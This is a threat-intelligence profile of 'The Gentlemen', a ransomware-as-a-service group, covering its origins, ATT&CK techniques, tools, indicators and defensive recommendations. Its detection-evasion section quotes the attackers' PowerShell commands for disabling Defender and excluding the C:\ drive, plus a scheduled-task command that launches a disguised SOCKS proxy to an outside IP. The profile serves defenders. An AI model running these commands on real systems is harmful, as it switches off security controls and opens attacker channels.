TLP:CLEAR
$ FINANCIALLY MOTIVATED · RAAS · LIKELY RUSSIAN-SPEAKING (CIS-AVOIDANT)
// Threat Actor Profile — Ransomware-as-a-Service / Multi-Platform Encryptor Operation

THE GENTLEMEN

PROFILE COMPILED: 2026-09-08  |  SOURCES: Check Point Research, Microsoft MSTIC, Halcyon, Huntress, FortiGuard, The Cyber Express, MITRE CTID (7 sources)
Status: ACTIVE — RAPIDLY SCALING
Threat Level: CRITICAL
Primary Motive: Financial Extortion (Double-Extortion RaaS)
Active Since: July 2025
MITRE ATT&CK: No G-ID assigned as of compile date
⚡ THREAT INTEL UPDATE — 2026-07-24
Named Most Active Ransomware Operation Globally, Q2 2026
Cyble Research and Intelligence Labs designated The Gentlemen the single most active ransomware group worldwide during Q2 2026, outpacing established operations including LockBit, Cl0p, and RansomHub (The Insurer, 2026-07-24). This follows a May 4, 2026 leak of the group's internal "Rocket" backend database, which independently corroborated the scale and structure Check Point Research and Halcyon had already begun tracking. The group shows no sign of slowing as of this compile date.
328+
Victims Claimed, Jan–May 2026
#1
Most Active RaaS Globally, Q2 2026
90%
Affiliate Profit Share
66
Countries Targeted
00
Overview

The Gentlemen is a ransomware-as-a-service operation that, in barely over a year of existence, has become the single most prolific ransomware brand on the internet by volume. Formed in July 2025 out of a payment dispute with the Qilin RaaS program — its founder publicly alleged Qilin owed him roughly $48,000 in unpaid affiliate commissions — the group spent two months building its own infrastructure before opening its doors to affiliates in September 2025. By the first five months of 2026 it had claimed more than 328 victims across 66 countries, and by Q2 2026, Cyble Research and Intelligence Labs ranked it the most active ransomware operation globally, ahead of established brands like LockBit, Cl0p, and RansomHub (The Insurer, 2026-07-24; Halcyon, 2026).

What makes this growth curve unusual is not just its speed — the group matched in five months what took Akira twelve months and Qilin eighteen months to reach (Halcyon, 2026) — but the mechanism behind it. The Gentlemen offers affiliates a 90% cut of ransom proceeds, a figure matched previously only by RansomHub against the RaaS industry standard of 70–80% (Halcyon, 2026). That economic aggression, paired with a genuinely multi-platform Go-based locker capable of encrypting Windows, Linux, BSD, and NAS hosts alongside a dedicated C-based ESXi variant, has let a small core team punch far above its headcount.

On May 4, 2026, the group's own internal operational backend — a system it calls "Rocket" — was compromised and partially leaked by a third party operating under the handle "n7778." The leak included a server shadow file exposing operator usernames, roughly 44 megabytes of an estimated 16-gigabyte internal chat log archive, and enough operational detail that Check Point Research was able to publish an unusually granular profile of the group's leadership, tooling, and internal culture (Check Point Research, "Thus Spoke…The Gentlemen," 2026). That leak, rather than slowing the group down, arrived in the middle of its steepest growth quarter — underscoring that this operation's resilience does not depend on operational secrecy in the way older, more centralized ransomware brands did.

As of this compile date, no government has issued sanctions, no indictment has been unsealed, and MITRE has not yet assigned the group a formal ATT&CK Group ID — all consistent with an operation that, however large, is still under a year old in its current form. That absence of formal legal or framework recognition should not be read as an absence of threat: the group's targeting explicitly avoids Commonwealth of Independent States countries, a pattern consistent with Russian-speaking operators operating under an informal non-aggression understanding with their home region's law enforcement, and its scaling trajectory now sits well past the volume threshold that historically has triggered coordinated international takedown operations against comparable brands (LockBit, Hive).

01
Identity & Attribution
Primary NameThe Gentlemen
Sponsor / ParentNone — independent criminal RaaS enterprise; predecessor identity "ArmCorp" (Qilin affiliate cluster)
Actor TypeeCrime — Ransomware-as-a-Service Operator
Primary MotivationFinancial — double-extortion ransom + data-sale leverage
Active SinceJuly 2025 (first sample 2025-07-17; public split from Qilin 2025-07-22)
Last ObservedOngoing as of compile date — designated most active global RaaS operation, Q2 2026
MITRE G-IDNot yet assigned
Legal StatusNo public indictment, OFAC/EU sanction, or law enforcement action identified as of compile date
Named Administratorzeta88 (aka "hastalamuerte") — builds locker + RaaS panel, manages payouts
Tracking Aliases
The Gentlemen ArmCorp (predecessor / pre-split identity)
No secondary vendor nickname (e.g. a "-Panda"/"-Spider"/"-Chollima" style moniker) has converged across major vendors as of this compile date — consistent with the group's recency rather than any deliberate obfuscation of its own branding, which is unusually overt for a RaaS operation (public leak site, public X/Twitter naming-and-shaming account).
Attribution Confidence

[HIGH] on the group's operational identity and its Qilin/ArmCorp lineage — this rests on the administrator's own public statements at the time of the split, independently corroborated by Check Point Research's analysis of leaked "Rocket" backend chat logs against separately-observed malware samples and infrastructure. [MEDIUM] on the completeness of the personnel roster: nine handles (zeta88, qbit, quant, Protagor, Wick, mAst3r, Bl0ck, JeLLy, Kunder) appear in the leaked material, but this is a snapshot of one leaked archive at one point in time, not a verified exhaustive membership list, and a RaaS model by definition includes an unknown number of additional, uncatalogued affiliates operating under 8 distinct Tox IDs across at least 29 identified campaigns (Check Point Research, 2026). What would raise this to HIGH: independent confirmation of individual handles' real-world identities via law enforcement action, which has not yet occurred.

02
Campaign & Operational Timeline
JUL 2025
Formation & Split From Qilin
First ransomware sample appears 2025-07-17. On 2025-07-22, administrator "hastalamuerte" publicly alleges Qilin owes his cluster (then operating as ArmCorp, a Qilin affiliate) approximately $48,000 in unpaid commissions, triggering the public break and rebrand (Halcyon, 2026).
SEP 2025
RaaS Platform Publicly Marketed
The Gentlemen opens its affiliate program on criminal forums, advertising a 90%-affiliate / 10%-operator profit split — an aggressive rate matched previously only by RansomHub against a 70–80% industry norm (Halcyon, 2026).
JAN–MAR 2026
Explosive Scaling Period
48 claimed attacks in January, 91 in February; more than 200 cumulative victims claimed January through March 2026, a pace Halcyon assesses as mirroring early LockBit 3.0's growth curve and second in volume only to Qilin during this specific window (Halcyon, 2026).
4 MAY 2026
"Rocket" Backend Database Leaked
A third party operating as "n7778" sells proof files from the group's internal operational system ("Rocket"): a server shadow file exposing operator usernames, and roughly 44.4 MB of an estimated 16.22 GB internal chat archive spanning INFO, general, TOOLS, and PODBOR channels. This becomes the primary source base for Check Point Research's subsequent deep-dive profile (Check Point Research, 2026).
28 MAY 2026
Microsoft Publishes Technical Dissection
Microsoft's Security Blog publishes a detailed technical analysis of the self-propagating Go-based encryptor, releases the Defender detection signature Ransom:Win64/Gentlemen.A, and documents the 21-attempt multi-vector lateral spread mechanism (Microsoft Security Blog, 2026-05-28).
Q2 2026
Ranked #1 Most Active RaaS Globally
Cyble Research and Intelligence Labs designates The Gentlemen the most active ransomware operation worldwide for Q2 2026, a ranking publicly reported 2026-07-24, outpacing LockBit, Cl0p, and RansomHub (The Insurer, 2026-07-24).
03
Attack Lifecycle Opportunistic edge-device compromise → 21-vector self-propagation → double-extortion

Initial access is affiliate-driven and opportunistic rather than centrally curated: internet-exposed edge devices (Fortinet FortiGate, Cisco appliances), OWA/Microsoft 365 credential brute-forcing, and VPN/RDP abuse are the dominant entry vectors, with the group's own leaked chat logs showing active tracking and evaluation of CVE-2024-55591 (FortiOS management-interface authentication bypass), CVE-2025-32433 (Erlang/OTP SSH vulnerability relevant to Cisco-hosted contexts), and CVE-2025-33073 (NTLM relay/reflection) as preferred exploitation paths (Check Point Research, 2026). A dedicated operator, "quant," maintains a high-specification credential-harvesting rig (Threadripper PRO, 128 GB RAM, RTX 5090) purpose-built for brute-forcing and a custom collection tool nicknamed "buildx641" for pulling credentials out of compromised OWA/O365 mail stores.

Once inside, the group's defining technical trait is the aggressiveness of its lateral spread: Microsoft documented up to 21 independent execution attempts per target host, staged from a hidden SMB share (share$) the malware creates on the initial foothold and an embedded copy of PsExec it deploys onto the network. From there it fans out via remote file copy over C$ administrative shares, PsExec, WMIC process creation, PowerShell remoting (Invoke-Command), direct WMI class invocation, and both user- and SYSTEM-context scheduled tasks and Windows services — each attempted from two staging locations (the infected host's own SMB share, and the target's local C:\Temp) to maximize the odds that at least one vector succeeds against a given host's specific defensive posture (Microsoft Security Blog, 2026-05-28).

Immediately before encryption, the locker systematically disables Microsoft Defender's real-time protection and firewall, deletes Volume Shadow Copy backups, terminates roughly 50 processes spanning databases, backup software (Veeam, Ipelius), EDR agents, and remote-access tools, and clears the Security, System, and Application Windows Event Logs. Encryption itself uses a per-file ephemeral Curve25519 key exchange feeding an XChaCha20 stream cipher, with a size-tiered strategy — files at or under 1 MB are fully encrypted, larger files are partially encrypted in distributed chunks at operator-selectable speed settings (roughly 27% down to under 1% of file content, depending on the "fast," "superfast," or "ultrafast" mode chosen) — a deliberate speed/thoroughness tradeoff that lets affiliates encrypt very large environments before defenders can react. Exfiltrated data and the encryption event both feed into a double-extortion negotiation conducted over individual, affiliate-specific Tox IDs rather than a centralized negotiation portal, and the group maintains a public X/Twitter account specifically to name non-paying victims for reputational pressure (Halcyon, 2026).

04
TTPs — MITRE ATT&CK Mapping Enterprise only — no ICS/OT evidence identified in source material
Reconnaissance
T1595
Active Scanning
[HIGH] Custom port-scanning utility "gogo.exe" plus Advanced IP Scanner and Nmap used for network discovery (FortiGuard, 2026).
Initial Access
T1190
Exploit Public-Facing Application
[HIGH] Active tracking/exploitation of CVE-2024-55591 (FortiOS), CVE-2025-32433 (Erlang SSH), CVE-2025-33073 (NTLM relay) per leaked internal chat logs (Check Point Research, 2026).
Initial Access
T1078
Valid Accounts
[HIGH] Stolen OWA/Microsoft 365 credentials and brute-forced VPN/RDP access used for entry (Check Point Research; FortiGuard, 2026).
Credential Access
T1110
Brute Force
[HIGH] Dedicated operator "quant" runs a purpose-built high-spec brute-force rig (Threadripper PRO/128GB/RTX 5090) (Check Point Research, 2026).
Credential Access
T1003
OS Credential Dumping
[MEDIUM] Custom tools "KslDump"/"KslKatz" documented for LSASS/Kerberos credential extraction (Check Point Research, 2026).
Lateral Movement
T1021.002
SMB / Windows Admin Shares
[HIGH] Remote file copy over C$ administrative shares plus embedded PsExec staged via a self-created hidden SMB share (Microsoft Security Blog, 2026-05-28).
Lateral Movement
T1021.006
Windows Remote Management
[HIGH] PowerShell remoting (Invoke-Command) used as one of the 21 documented lateral-spread execution vectors (Microsoft Security Blog, 2026-05-28).
Execution
T1047
Windows Management Instrumentation
[HIGH] WMIC process creation and direct WMI class invocation from multiple staged paths (Microsoft Security Blog, 2026-05-28).
Persistence
T1053.005
Scheduled Task
[HIGH] Tasks "UpdateSystem"/"UpdateUser" for startup persistence and "gentlemen_system" during SYSTEM privilege escalation (Microsoft Security Blog, 2026-05-28).
Persistence
T1547.001
Registry Run Keys
[HIGH] HKLM/HKCU Run-key entries "GupdateS" (SYSTEM) and "GupdateU" (user) (Microsoft Security Blog, 2026-05-28).
Defense Evasion
T1562.001
Impair Defenses: Disable Tools
[HIGH] Scripted Defender real-time-monitoring disable, service stop, and self-exclusion via Set-MpPreference/Stop-Service (Huntress, 2026) — full commands in Section 11.
Defense Evasion
T1070.001
Clear Windows Event Logs
[HIGH] Targeted clearing of Security/System/Application logs only, verified via Event IDs 104 and 1102 — other logs left intact (Huntress, 2026).
Impact
T1490
Inhibit System Recovery
[HIGH] Volume Shadow Copy deletion via vssadmin and wmic prior to encryption (Microsoft Security Blog, 2026-05-28).
Impact
T1489
Service Stop
[HIGH] ~50 targeted process/service kills spanning databases, backup software, EDR agents, and remote-access tools pre-encryption (Microsoft Security Blog, 2026-05-28).
Impact
T1486
Data Encrypted for Impact
[HIGH] Per-file ephemeral Curve25519 ECDH + XChaCha20 stream cipher, size-tiered partial encryption for large files (Microsoft Security Blog, 2026-05-28).
Command & Control
T1090
Proxy
[HIGH] SOCKS proxy tunnel via a disguised scheduled task (svchost32.exe) beaconing every 2 minutes (Huntress, 2026) — full command in Section 11.
Exfiltration
T1567
Exfiltration Over Web Service
[MEDIUM] Double-extortion data staging ahead of leak-site publication; specific exfil-channel tooling not fully documented in public source material as of compile date.
05
Targeting Profile
Sector Targeting
IT / Managed Services
PRIMARY
Manufacturing
HIGH
Healthcare
HIGH
Construction
MED
Government
MED
Financial Services (BFSI)
MED
Geographies66 countries, all six inhabited continents. H1 2026 regional volume: Europe/UK 144 attacks, Asia-Pacific 114, Middle East & Africa 56, South America 46 (The Cyber Express, 2026). Thailand is the single largest national total (27 victims); only ~7% of victims are US-based (Halcyon, 2026).
Victim ProfileMid-to-large organizations with centralized identity infrastructure (AD/OWA/M365) and continuous operational demands — downtime-sensitive environments maximize ransom leverage.
Preferred EntryInternet-exposed edge devices (Fortinet, Cisco), OWA/M365 credential attacks, VPN/RDP abuse; documented reuse of data stolen from one victim's environment to socially engineer a second, unrelated victim.
Target DoctrineOpportunistic and affiliate-driven rather than centrally curated. Explicit avoidance of Commonwealth of Independent States (CIS) countries — no targeting of Russia or CIS-member states identified in source material (FortiGuard, 2026).
06
Tools, Malware & Infrastructure
GENTLEMEN LOCKER CUSTOM ENCRYPTOR · WIN/LINUX/BSD/NAS (GO) + ESXi (C)
Multi-platform ransomware payload. Per-file ephemeral Curve25519 ECDH key exchange feeding an XChaCha20 stream cipher; size-tiered encryption (full for files ≤1MB, variable-percentage chunked encryption for larger files at operator-selectable "fast/superfast/ultrafast" speed settings); mandatory password argument at execution, limiting automated sandbox analysis. Ransom note README-GENTLEMEN.txt, desktop wallpaper gentlemen.bmp, encrypted-file extension .umc16h (Microsoft Security Blog, 2026-05-28).
GLOCKER CUSTOM · RAAS ADMIN PANEL
Affiliate management, target assignment, and payout-tracking panel. Notably built by administrator zeta88 using AI coding assistance ("vibe-coded") in approximately three days — a data point on the group's development velocity and its willingness to trade traditional secure-development discipline for iteration speed (Check Point Research, 2026).
KslDump / KslKatz CUSTOM · CREDENTIAL ACCESS
LSASS memory and Kerberos ticket dumping tools referenced in leaked internal tooling channels (Check Point Research, 2026).
NetExec (NXC) OSS · AD ENUMERATION / LATERAL MOVEMENT
Open-source Active Directory attack-surface enumeration and exploitation swiss-army-knife, standard in the group's internal toolset (Check Point Research, 2026).
TaskHound / PrivHound / CertiHound OSS · AD/ADCS ATTACK-PATH MAPPING
Privilege-escalation and AD Certificate Services abuse-path discovery tooling used during internal reconnaissance (Check Point Research, 2026).
Titanis CUSTOM · ETW / LOGGING MANIPULATION
Windows logging and Event Tracing for Windows (ETW) manipulation tooling; Check Point assesses the underlying technique lineage traces to published zerosalarium security research on ETW/logging bypass (Check Point Research, 2026).
MANSPIDER OSS · FILE SHARE SEARCH
Automated content search across SMB shares, used to locate sensitive data ahead of exfiltration for double-extortion (Check Point Research, 2026).
PowerZure OSS · AZURE / CLOUD ABUSE
Open-source Azure post-exploitation toolkit used against cloud-hosted identity and infrastructure (Check Point Research, 2026).
ZeroPulse / Velociraptor C2/REMOTE ACCESS · LEGITIMATE DFIR TOOL ABUSE
Velociraptor — a legitimate, widely-used open-source DFIR/endpoint-visibility platform — is repurposed by the group for its own remote access and collection needs, alongside the custom "ZeroPulse" component. Cloudflare Zero Trust tunnels, WireGuard, and OpenVPN provide additional C2 transport (Check Point Research, 2026).
Embedded PsExec LOLBIN · LATERAL MOVEMENT
Bundled with the locker and deployed via the malware's self-created hidden SMB share as one of seven-plus distinct remote-execution vectors used during self-propagation (Microsoft Security Blog, 2026-05-28).
gogo.exe / Sputnik CUSTOM · PORT SCANNING & OSINT RECON
gogo.exe performs internal network port scanning; "Sputnik" is a custom OSINT browser extension used for target reconnaissance (Check Point Research, 2026).
chamd5.org / hashcracking_bot 3RD-PARTY SERVICE · CREDENTIAL CRACKING
Outsourced hash-cracking services used against harvested credential material rather than in-house cracking infrastructure alone (Check Point Research, 2026).
Vulnerability cross-reference: no vuln card in this project's library currently covers CVE-2024-55591, CVE-2025-32433, CVE-2025-33073, or the broader set of ~14 CVEs FortiGuard associates with this group's exploitation activity (2024-1709 through 2026-69836). None of the 8 existing vuln cards (Heartbleed, Spectre/Meltdown, PaperCut, PrintNightmare, Rockwell Logix Auth Bypass, WatchGuard Firebox Auth Bypass, SonicWall SonicOS Access Control, Chrome WebGL OOB Write) match — gap noted rather than a fabricated cross-link. No companion incident card on file either.
07
Indicators of Compromise All IPs and domains defanged
⚠ IOC HANDLING — All IPs and domains in this table are defanged. Reconstruct before use in detection tooling. Reference URLs in Section 13 are NOT defanged.
Type Value / Description Source Date
HASH22b38dad7da097ea03aa28d0614164cd25fafeb1383dbc15047e34c8050f6f67 — Gentlemen Windows encryptor (SHA-256)Microsoft MSTIC2026-05-28
HASH078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b — Embedded PsExec binary (SHA-256)Microsoft MSTIC2026-05-28
HASHfe1033335a045c696c900d435119d210361966e2fb5cd1ba3382608cfa2c8e68 — Ransom wallpaper bitmap, gentlemen.bmp (SHA-256)Microsoft MSTIC2026-05-28
IP193.233.202[.]17:44729Huntress2026
FILEREADME-GENTLEMEN.txt (ransom note filename)Check Point Research / Microsoft MSTIC2026
FILEgentlemen.bmp (desktop wallpaper replacement)Check Point Research2026
FILE.umc16h (extension appended to encrypted files)Microsoft MSTIC2026-05-28
REGISTRYHKLM\Software\Microsoft\Windows\CurrentVersion\Run\GupdateSMicrosoft MSTIC2026-05-28
REGISTRYHKCU\Software\Microsoft\Windows\CurrentVersion\Run\GupdateUMicrosoft MSTIC2026-05-28
TASKScheduled task names: WindowsConnSvc, UpdateSystem, UpdateUser, gentlemen_systemMicrosoft MSTIC / Huntress2026
MALWARERansom:Win64/Gentlemen.A (Microsoft Defender detection name)Microsoft MSTIC2026-05-28
NOTECheck Point Research published a full appendix of 30 Windows and 3 Linux sample hashes plus a YARA rule keyed on the strings "Silent mode," "README-GENTLEMEN.txt," "gentlemen.bmp," and "gentlemen_system" — not fully reproduced here; see Check Point's report for the complete set.Check Point Research2026
08
Analyst Assessment
Overall Threat LevelCRITICAL
Attribution ConfidenceHIGH (identity) / MEDIUM (full roster)
TrajectoryEscalating — fastest documented RaaS scaling curve to date
Most Dangerous CapabilityFive-platform simultaneous encryption paired with 21-vector self-propagation, compressing time-to-impact across large heterogeneous environments
Primary Intel GapNo MITRE G-ID or government advisory yet; independent verification of leak-derived claims beyond Check Point's own corroboration is limited
Ecosystem / Affiliated Groups
Qilin (progenitor RaaS — split origin) ArmCorp (predecessor cluster identity) HelloKitty (positively regarded peer, per leaked chats) Dragon Force (positively regarded peer) Black Basta / Devman (negatively regarded rival)

The group's growth rate is itself the primary threat signal here, more than any single technical capability. Matching in five months what took Akira a year and Qilin eighteen months to reach is not simply a function of aggressive marketing (the 90% affiliate split) — it reflects a genuinely competent, genuinely multi-platform toolchain that lowers the skill floor for affiliates while still producing five-figure-to-six-figure ransom outcomes (the documented UK consultancy negotiation closed at $190,000 against an opening demand of $250,000). A RaaS operation that can absorb and productively deploy a large, loosely-coordinated affiliate base without its core tooling falling apart is a durable threat model, not a flash in the pan.

There is a genuine epistemological wrinkle worth naming directly: an unusually large share of what is publicly known about this group's internal structure, personnel, and culture derives from one leaked archive of the group's own internal chat logs (the May 2026 "Rocket" breach), not from independent law-enforcement seizure or long-term external telemetry the way older, better-established RaaS brands have been profiled. Check Point Research's willingness to publish detailed personnel attribution rests on cross-corroboration between that leaked chat content and independently observable artifacts — malware samples, C2 infrastructure, TOX IDs tied to actual campaigns — which is a reasonable evidentiary basis, but analysts should hold open the possibility that some leaked internal chat content reflects affiliate bravado or exaggeration rather than verified operational fact, particularly around claimed revenue figures and negotiation outcomes not independently confirmed by victim-side reporting.

Forward trajectory: the group's current volume and geographic spread now sit well past the threshold that has historically triggered coordinated international law-enforcement action against comparable brands (LockBit's 2024 disruption, Hive's 2023 takedown) — no such action has been publicly reported against The Gentlemen as of this compile date, but the gap between "operationally significant enough to attract that response" and "actually receiving it" has narrowed. What would change this assessment: a formal government attribution/sanction action (none exists yet), independent (non-leak-derived) confirmation of the personnel roster via arrest or seizure, or a public law-enforcement disruption of the "Rocket" infrastructure itself.

09
Defensive Recommendations
01
Patch and restrict management-plane access on internet-facing Fortinet FortiGate and Cisco edge devices — do not expose SonicOS/FortiOS/Cisco management interfaces directly to the internet; apply CVE-2024-55591 and CVE-2025-32433 fixes without delay.
Counters: T1190
02
Enforce phishing-resistant MFA on all OWA/Microsoft 365 and VPN/RDP remote-access paths — the group's dedicated brute-force infrastructure and credential-collection tooling specifically target these entry points.
Counters: T1078, T1110, T1133
03
Deploy Attack Surface Reduction rules blocking PsExec/WMI-originated process creation and unsigned/untrusted executable execution — this directly disrupts the documented 21-vector lateral-spread mechanism.
Counters: T1021.002, T1047, T1053.005
04
Enable EDR/AV tamper protection so real-time protection cannot be disabled via scripted Set-MpPreference/Stop-Service commands run with local administrative rights.
Counters: T1562.001
05
Forward Security/System/Application Windows Event Logs off-host to a centralized, tamper-resistant SIEM in near-real-time — local log clearing (Event IDs 104/1102) is a core anti-forensics step in this group's playbook and only defeats analysis if logs never leave the host.
Counters: T1070.001
06
Segregate backup infrastructure (Veeam and similar) onto isolated management networks with immutable/air-gapped retention — the group explicitly targets and terminates backup software as a pre-encryption step.
Counters: T1489, T1490, T1486
07
Alert on anomalous scheduled-task creation using system-process-mimicking binary names (e.g. non-standard "svchost"-named executables) paired with outbound connections to non-standard high ports — the documented C2 persistence mechanism generates noisy, detectable Task Scheduler events (107/101/203) if monitored.
Counters: T1053.005, T1090
10
OPSEC Procedures Observed infrastructure hygiene, rotation patterns, anti-forensics
Infrastructure Rotation [MEDIUM]
C2/remote-access transport is deliberately diversified across Cloudflare Zero Trust tunnels, WireGuard, and OpenVPN rather than a single fixed channel. Negotiation communications are decentralized across at least 8 distinct per-affiliate Tox IDs spanning 29 identified campaigns rather than a single centralized channel — this structurally limits the impact of any single takedown or Tox-ID compromise (Check Point Research, 2026).
Living-off-the-Land Ratio [HIGH]
A hybrid model: heavy reliance on native/LOLBin tooling for lateral movement and system manipulation specifically (PsExec, WMIC, PowerShell remoting, vssadmin, schtasks, ICACLS), layered with custom-built tooling reserved for credential harvesting and AD/ADCS attack-path enumeration (KslDump/KslKatz, TaskHound/PrivHound/CertiHound, NetExec). The native-tool preference for propagation specifically appears deliberate — it blends into expected Windows administrative activity across the 21 documented execution vectors, while the custom tooling is reserved for tasks where off-the-shelf options are less effective.
Anti-Forensics Routines [HIGH]
Selective (not blanket) event log clearing — Security, System, and Application logs specifically, verified operationally via Event IDs 104 and 1102 — alongside prefetch file removal, Defender diagnostic log deletion, RDP log removal, and PowerShell command-history deletion. An optional free-space wipe using random data in 64 MB blocks is available for affiliates seeking to defeat file-carving recovery. Notably, other Windows event logs are left untouched by the standard playbook — a real, documented detection gap rather than comprehensive anti-forensics (Huntress, 2026).
Timing & Operational Patterns [LOW]
Source material reviewed does not document specific beacon jitter configuration, victim-timezone-relative work-hour clustering, or dwell-time-before-action patterns with enough precision to state a pattern here — stated as a genuine intelligence gap rather than inferred.
Tooling Hygiene [MEDIUM]
The locker requires a mandatory password argument at execution, which meaningfully limits automated sandbox/AV-farm analysis of samples obtained without the correct invocation. Per-file ephemeral key generation (Curve25519) is itself a form of tooling hygiene against bulk static decryption research. Counterpoint: the RaaS admin panel (GLOCKER) was reportedly built via rapid AI-assisted "vibe coding" in about three days, suggesting comparatively low investment in secure-development discipline for internal tooling relative to the locker itself.
Communications Security [MEDIUM]
Administrator zeta88 reportedly directs affiliates to use AI assistants (DeepSeek, Qwen, Kimi, Emi are the group's stated preferences) as a technical reference tool in place of discussing sensitive operational detail in internal chat channels — a deliberate attempt to reduce the internal comms footprint available for later compromise or leak. This discipline notably did not prevent the May 2026 "Rocket" database leak itself, which exposed roughly 44 MB of the very chat archive this practice was presumably meant to minimize.
11
Detection Evasion Specific techniques, LOLBin sequences, EDR bypass patterns
Defender Real-Time Protection Disable T1562.001
EDR BYPASS PowerShell
Scripted disabling of Microsoft Defender real-time monitoring and the underlying WinDefend service, run with local administrative rights immediately prior to payload execution (Huntress, 2026).
Set-MpPreference -DisableRealtimeMonitoring $true Stop-Service -Name WinDefend -Force Set-Service -Name WinDefend -StartupType Disabled
Defender Exclusion Abuse T1562.001
EDR BYPASS PowerShell
Adds the encryptor's own path/process as a Defender exclusion, additionally excluding the entire C:\ volume, and disables Controlled Folder Access. Huntress observed this sequence run specifically after an initial encryptor deployment attempt had failed, followed by redeployment of the ransomware executable — indicating this is used as an active-troubleshooting fallback by affiliates, not only a first-attempt default (Huntress, 2026).
Add-MpPreference -ExclusionProcess C:\Users\[REDACTED]\downloads\G_hlm7jj_windows_amd64.exe -Force Add-MpPreference -ExclusionPath C:\ -Force Set-MpPreference -EnableControlledFolderAccess Disabled -Force
Selective Event Log Clearing T1070.001
SIEM EVASION
Targets only the Security, System, and Application Windows Event Logs specifically, rather than a blanket wipe. Log-clearing success is itself verifiable via the log-clear events it generates (Event ID 104 for Application/System, Event ID 1102 for Security) — and other Windows event logs (e.g. PowerShell operational, Task Scheduler) are notably left untouched by this routine, which Huntress flags as a genuine detection opportunity (Huntress, 2026).
Verification artifacts left behind: Event ID 104 — Application/System log cleared Event ID 1102 — Security log cleared (Other Windows event log channels: not cleared by this routine — detection opportunity)
SOCKS Proxy C2 via Disguised Scheduled Task T1090 / T1053.005
NETWORK SIEM EVASION
Persistent SOCKS proxy tunnel established via a scheduled task running every two minutes as SYSTEM, executing a binary disguised with a legitimate-sounding name (svchost32.exe — deliberately similar to the genuine Windows svchost.exe) staged in C:\Windows\Temp. Huntress notes the task itself generates noisy, detectable Task Scheduler forensic events (IDs 107, 101, 203) that survive the group's selective log-clearing routine, since Task Scheduler logs are not among the logs it clears (Huntress, 2026).
schtasks /create /tn WindowsConnSvc /tr C:\Windows\Temp\svchost32.exe client 193.233.202[.]17:44729 R:1081:socks /sc minute /mo 2 /ru SYSTEM /f
Firewall / LSA / SMB1 Weakening T1562.004
EDR BYPASS NETWORK
Disables Windows Firewall across all profiles, modifies LSA registry settings to permit anonymous access, and re-enables the legacy SMB1 protocol — each weakening a distinct network-visibility or access-control layer ahead of lateral movement (Microsoft Security Blog, 2026-05-28). Specific command syntax/registry values for this step are not publicly documented in the source material reviewed as of this compile date — noted as a gap rather than reconstructed.
Specific commands/registry values not publicly documented as of 2026-09-08.
12
Emulation Resources MITRE CTID & Published Adversary Emulation Plans
MITRE CTID — ADVERSARY EMULATION PLAN Not Available
No MITRE Center for Threat-Informed Defense adversary emulation plan has been published for The Gentlemen as of 2026-09-08. Checked directly against the current adversary_emulation_library repository listing (11 full plans on file: APT29, Blind Eagle, Carbanak Group, FIN6, FIN7, menuPass, OceanLotus, OilRig, Sandworm, Turla, Wizard Spider) — this group is not among them, consistent with its recency.
Additional Emulation Resources
Check Point
YARA rule (strings: "Silent mode", "README-GENTLEMEN.txt", "gentlemen.bmp", "gentlemen_system") · Accessed: 2026-09-08
Microsoft
Defender signature (Ransom:Win64/Gentlemen.A) + Advanced Hunting KQL queries · Accessed: 2026-09-08
GAP
No Atomic Red Team tests or SigmaHQ-published detection rules specific to this group were identified in source material reviewed.
Stated as of: 2026-09-08
13
References URLs are NOT defanged — navigate directly